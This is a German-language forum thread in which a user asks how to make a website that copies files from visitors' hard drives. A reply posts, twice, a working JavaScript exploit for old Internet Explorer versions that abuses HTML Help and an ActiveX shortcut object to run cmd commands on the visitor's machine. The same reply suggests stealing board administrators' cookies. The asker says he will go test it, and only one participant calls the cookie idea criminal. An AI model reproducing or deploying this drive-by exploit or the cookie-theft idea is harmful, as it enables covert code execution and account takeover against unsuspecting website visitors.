HD kopieren
 

hi leutz ich hab mal ne frage ich wollte eine hp erstellen womit ich dateien von anderen runterziehen kann. geht sowas ? ich hab von irgend einer sicherheitslücke im IE gehört damit wäre es machbar, weiss aber nicht ob es stimmt. plz help ;) :) :)

lol monro du hast immer die ausgefallensten fragen auf lager respekt digga :p also duch schwachstelle im IE von version 5.01 bis 6.028 kann einem webmaster ermöglichen auf persönliche daten des besuchers zuzugreifen, aber das zugreifen funktioniert nicht wie bei einem troja wo du machen kannst was du willst, sondern im javascript muss du vorher einstellen was das script genau machen muss. aber diese einstellung könnte dir weiterhelfen hehe
hier ein script das ich selbst getestet habe und es geht:


<script>
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:') ");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=","+prog+","+args+""></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>



<HTML>
<BODY>
<script>
prog = 'cmd';
args = '/k net send * ..spieletermine..Networks..visit..us...www.google. de...';

if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:') ");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=","+prog+","+args+""></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
</BODY>
</HTML>


naja ganze HD zu kopieren würde ich nicht unbedigt empfehlen *g* aber was ganz interessant ist, sind cookies wenn der besucher z.B. admin von irgend einem board ist, den rest kannst du dir ja denken.......

jo thx mein bester ;) ich geh mal bisschen testen....

schau dir am besten diese seite auch mal an http://www.heise.de/ct/browsercheck/e5demo.shtml

nunja das sehe ich eher als kriminell an als das was ich gefragt habe , aber ich sag nun mal nichts

@biene haeh versteh ich nu gar nich uebrigens bei mir funzt dsa exploit net! Mozilla is n!ce